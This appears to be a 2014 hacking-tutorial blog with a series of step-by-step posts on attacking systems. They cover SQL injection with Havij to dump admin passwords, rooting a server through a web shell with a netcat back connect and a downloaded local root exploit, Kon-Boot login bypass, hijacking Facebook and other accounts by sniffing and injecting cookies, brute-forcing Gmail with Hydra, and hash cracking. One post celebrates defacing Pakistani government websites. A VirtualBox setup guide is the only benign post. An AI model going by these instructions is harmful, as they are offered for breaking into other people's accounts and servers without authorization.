Saturday, August 9, 2014

Hide Files Behind Image.

1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in.RAR format.With the help of the WinRAR.
3. And most important is thatpaste both the files on desktop. You may do this anywhere instead of desktopif you have some basic understanding of command line.
4. Now open cmd by going toStart>Accessories>Command Prompt and type following commands in it.
cd desktop
5. After that type command given below.
Copy /b imagename.jpg+ filename.rar = finalimage.jpg
6. Here replace imagename, filename and finalimage with your image and file names.
NOTE: According to data the size of the image also increases.
1.How to see the data behind the image?
*.Open the image with WinRAR and you will even see the file hidden

How to hack a website using SQL Injection Havij

How to hack a website using SQL Injection Havij :-
Just Follow these easy steps :-
1) First download havij
2) Run Havij SQL Injection software and copy and
paste vulnerable website link
3) Now click in the “Analyze” button
4) Then It shows some messages there. Be alert on
it and be show patience for sometime to find it’s
vulernable and type of injection and if db server is
mysql and it will find database name.Then after get
it’s database is name like xxxx_xxxx
5) Then Move to another operation to find tables
by clicking “tables” as figure shown. Now click “Get
tables” Then wait some time if needed
6) After founded the tables ,you can see there will
be “users” Put mark on it and click in the ” get
columns ” tab
7) In that Just put mark username and password
and click “Get data”
8) Finally you got now username and password of
the admin…

Rooting a Server : Learn Ethical Hacking

Root is the Administrator of all server. If someone
got root access he
can do anything with server like delete and copy
anything on server ;
can deface all the home pages (massive deface ).
We can't talk about root on windows. That enough
for beginner
because if I talk about the root I need another
book. So, I guess now
we know the importance of root access and why
we try to got root.
How to get Root?
There are 3 ways to get ROOT on server :
1 – With local Root.
2 – With SQL by reading same important files on
it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will
explain the other ways
soon in some other post.
OK, let's back to work.
After Uploading your shell on server and getting
the localroot you
will do a back connect and run the localroot to
Get root . This is a
small idea how it work in the next step you will
see how to
find localroot and run it to get root access .
How to Search Local root?
First of all we you need to know what version of
Kernel.
You can know that from your shell, for example
this version is 2.6.18 -
2012
Go to EXECUTE on your shell and write "uname -
a". You will get the
same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db,
packetstormsecurity,
vfocus, injector, etc who provides these local
roots. One more thing to
notice is, that there exists two types of local
roots :
1. Local.C : which are not ready.
2. Local : ready to use.
How to get Root access?
First you need a shell with a Back Connect option
like this :
Enter your "Public IP Address" in SERVER, port you
want to connect on
and leave it Perl this time, and Finally connect.
So now you must receive the back connect with a
Tool named netcat u
can download it from the
net. After that open your terminal if you are under
linux or CMD if you
are under Windows. I will explain only Linux, and
for Windows, its all
the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 - unzip local-Root.zip
4 - chmod 777 local.c
5 - now to change the local-root from local.c >
local
gcc local.c -o local Then you will find local.c
transformed to local
6 - chmod 777 local
7 - ./local to local root work
8 – su
then see your id uid=0(root) gid=0(root)
groups=0(root)
Getting UID=0 means, u had got root priviledges
and hence can do
variety of stuff on the remote server say Mass
deface, dump database,
redirect sites, change content, etc etc

Friday, August 8, 2014

How To Setup A Vitual Machine

1)Download VirtualBox v2.2.4 from here (works for all Windows OSes as well as 32-bit and 64-bit)
http://download.virtualbox.org/virtualbo...78-Win.exe
2)Install it like you would install any other application, no technical stuff here.
3)Open it up and click the "New" button on the top-left.
4)Click "Next", then enter a name for your virtual PC, and select the relevant operating system (Windows in this case) and Version (XP or Vista, which ever you want).
5)Now you get to assign how much RAM you want the virtual PC to have. You shouldn't assign more then 50% of your actual RAM as this might give a "low host memory" error while you're running the VM. I personally have 2GB and I installed XP, so I assigned 768MB memory to it, which is enough for XP to run smoothly. If you have Vista, you're gonna need at least 1.5 GB to run it smoothly.
6)Now you have to create a virtual hard disk, where the virtual OS, and all other files will go. Obviously as this is your first time, select "Create new hard disk"
7)Hit "Next" the first time, then you have to select the type of HD you want to create.
Dynamically expanding storage:In this, you assign a maximum size to your virtual HD, but it doesn't take up that much disk space as soon as you create it. It expands as the virtual PC demands more space. But it will stop expanding once it reaches its max size (which you specify in a later step).
Fixed storage:Simple; you assign, say, 5GB of space, and a 5GB file is created. All your virtual data will be stored in here.
I personally recommend you to choose the Dynamically expanding option, since it saves disk space as long as you don't need it.
Select your desired option, and click "Next"
8)This virtual hard disk is actually just a single file with a .vdi extension, you don't need a separate partition for it or anything. By default, this vdi file will be created in your system folder (C drive in most cases), but if you want to save it somewhere else, then click on the small folder icon to the right of the name bar and choose a desired location.
Also assign a max size for your virtual hard disk. Choose how much you want, and how much you have to spare. For an XP install, with some basic apps like Firefox and a bunch of hacking tools, 3.5GB should be enough. For Vista, you'll need at least 6-7GB.
9)Review the specs of the virtual HD and press "Finish" Hit "Finish" again.
10)Now just one last step: Your virtual machine should appear in the left pane. Select it, and click "Settings" Go into the "CD ROM" tab on the left, check "Mount CD/DVD drive"
Check "Mount CD/DVD drive" if you want to install it from a disc (also insert the disc). Alternatively, select "ISO Image File" if you want to install from an ISO file, browse and select the relevant OS ISO.
11)In the "General" tab, you can also assign the amount of video memory you want the guest OS to have (the OS installed on a VM is called a guest OS). Be default, its 4MB which is pretty low. Again, don't assign more then 50% of your real VRAM. I personally have 512MB and I assigned 128MB. Also check the "Enable Hardware Acceleration" option below if you have a dedicated gfx card (not ones that come built-in to the motherboard).
12)Click OK, and you're done. Select the VM from the left pane, and hit "Start". Install the OS as you would install it on a real PC, there's no difference.
13)Once you've done installing, there are few things to do. Firstly, go into the "Devices" menu of the VM window and click "Install Guest Additions". This is a 20MB ISO which will add more functionality to your VM like automatic mouse pointer integration and allow you to set a higher screen resolution for example.
14)If you've installed XP, then see whether or not the internet is working. There was a bug in v2.2.0 (the version I'm using) where internet via DSL and LAN didn't work with NAT. This has probably probably been fixed with the new v2.2.4, but in case it hasn't been:
a) Download this DLL file:
http://www.mediafire.com /?0qt3z2ozjyq(it is also present on Sun's website, but the link was very obscure so I just uploaded it elsewhere)
b) Copy it, and paste it in the VirtualBox folder i.e. C:\Program Files\Sun\xVM VirtualBox
Make a back-up of the original DLL just to be safe
c) Check if it works, if it still doesn't go into the VM's settings again, and in the network tab, make sure "Enable Network Adapter" is checked. If you're using LAN, also make sure that the "Attached to" is set to NAT.
d) If it still won't budge, ask for help at VirtualBox forums.

Step by Step Hacking Tutorials Log in Windows Without Password with Kon Boot:

1. First, we will make the bootable Kon Boot by using the default kon-boot installer that already provided when we buy this program, but if we use the free version, we can create the image by following the tutorial how to create bootable usb.
Choose the USB we want to use to install kon-boot from the "available USB drives" drop down list and click "Install to USB stick" when finished.
The installation process will take approximately 1 minute.
note: Make sure you choose the correct USB, because the installation process will erase all data on your USB device.
2. The Kon-boot USB now ready, we need to configure the BIOS settings to change the boot order to boot from USB. You can view our previous tutorial about changing BIOS boot order in step 5.
3. This is the preview when we successfully boot from Kon-boot USB.
4. After the Kon-boot initialization screen, it will normally boot the Windows. When we press the SHIFT key 5 times (sticky keys), we can see the command prompt pooped out with system role.
5. We can enter Windows without a password, just click the arrow and we already inside the system.

Thursday, August 7, 2014

Step by step to Reveal Asterisk Saved Passwords onMozilla Firefoxand Chrome:

1. Open ourMozilla Firefox browser,
pressALT–> clickTools–> ClickAdd-ons
2. On Add-ons page, there is a search box, type firebugon the textbox and click search, or you can go directly to this pagehttps://addons.mozilla.org/en-US/firefox/addon/firebug/. Click install if there is a pop out window asking you to install this add ons.and restart yourbrowser.
3. This is the firebug button. to activate firebug you only need to click this button and click once again to deactivate.
4. Now we try to open a website with log in page, e.g: mail.live.comand input the password. Right click on the passwordbox and choose Inspect Element.
5. Double click the type="password"and change it in to type="text".
6. The asterisk password will be shown and revealed
7. How if it is on Google Chrome browser? The steps is the same.Open the log in page, right click the password box and choose inspect element
8. Change the input type="password"to type="text".
The password is revealed.

Create Bootable USB Kali Linux on Windows

1. Download the USB Installer and Plug the USB we want to use to create the bootable usb.
2. On the USB installer window

Step 1: Choose which linux distro or O.S we want to put on our USB

step:2: Locate the .ISO file of our O.S we want to put on our USB

step 3::Select the USB drive letter. Make sure you don't choose your external hard disk check the format drive to make sure we clean up all the content of our USB
Click Create


3. A pop up alert window will appear. Make sure we check again if there's something wrong or missing. Click Yes to start the bootable usb creation process.
4. Now we need to wait for the application to accomplish the tasks. The time taken is depend with which distro or O.S we want to create.When finished, just click Close and our USB was ready to boot.

5. Now we will continue to set up the boot order from our computer BIOS to USB. The picture below was taken from my Acer Aspire one netbook.you can press F2 to go to BIOS setup or F12 to change the boot device.

6. If we choose F12, here is the preview on my netbook Change the USB HDD order into number one to boot from the USB.

7. If we choose F2 or edit from BIOS setup.

Wednesday, August 6, 2014

Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

Step 1:
Download the Wire Shark and install it.
Step 2:
Next open the wire shark and then click on
interface.
Step 3:
Next choose a interface which is received and
sending packet and click on start
Step 4:
Continue the sniffing for around like 10 minutes.
Step 5:
After a maximum 10 minute stop the sniffing by going to a capture menu.
Step6:
its important step, now filter to http. cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie.
Step 7:
Now click on it and then goto the copy > Bytes
> Printable Text only
Step 8:
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
and then open facebook. com make sure you are
not login
Step 9:
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value
into it.
Step 10
Now refresh your page so then finally you Enter
the Victim Account.

Hack Windows 7 Password Using Ophcrack

Opcrack is an open source windows password cracker based on rainbowtables. It comes with Graphicaluser interface(GUI) and runs on multiple platform such windows, linux and mac. It allows you to recover or hack windows password.
1>Download OPhcrack by Clicking following link
2>Make Bootable Pendrive/CD
3>Boot System with this Pendrive or CD
4> All Done ...Your Password'll Appear !!!
download

Tuesday, August 5, 2014

How To Crack MD5 Encrypted Hash

Cain & Able. It is virus free software that can be downloaded from
http://www.oxid.it/cain.html.
You will have the options to use a dictionary or a brute force attack with this program.
To crack a hash online, you can use a multitude of websites. Some of my favourites include:http://www.md5decryp ...
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://www.md5-decrypter.com
http://www.md5encryption.com

How to Crack a Gmail Account Password in Kali Linux

Now openTerminal and enter the command Hydra, it will show you all the Syntax , Options and examples.
For Gmail Password cracking Syntex are like below :-

hydra -S -l -P -e ns -V -s 465 smtp.gmail.com smtp

Like i want to hack my own one Gmail account. so my command will be like below

root@RumKali:~#hydra -S -l rumhacktips@ gmail.com -P /root/Desktop/pw list 1.txt -e ns -V -s 465 smtp.gmail.com smtp

it will try all possible combination of passwords that present in your Word-list. When it will find valid password. it will stop the scanning and notify you “One valid Password found“.

Monday, August 4, 2014

dos attack tool

word top most attacking method dos attack method and you can download this tool following link
download

Saturday, August 2, 2014

Godzilla Hacker Takes Down Several Pakistani Government Websites

While the rest of the world was engaged in cyber security and privacy, an Indian patriotic hacker targeted 43 major Pakistani Government official websites, including‘President of Pakistan’, ‘Government of Pakistan’, 'Ministry of Defence’, and wholeMinistry of Pakistan.
Indian hacker Godzilla claimed responsibility to hack into one of the main proxy server of the Pakistan Government, which is being used to manage all the government websites.

http://www.pakistan.gov.pk
http://www.presidentofpakistan.gov.pk
http://www.mod.gov.pk
http://www.railways.gov.pk

www.cabinet.gov.pk
www.moitt.gov.pk . . . . . . and many more.

forensic software

more than 100 forensic software
forensic software
more than 100 forensic software
forensic software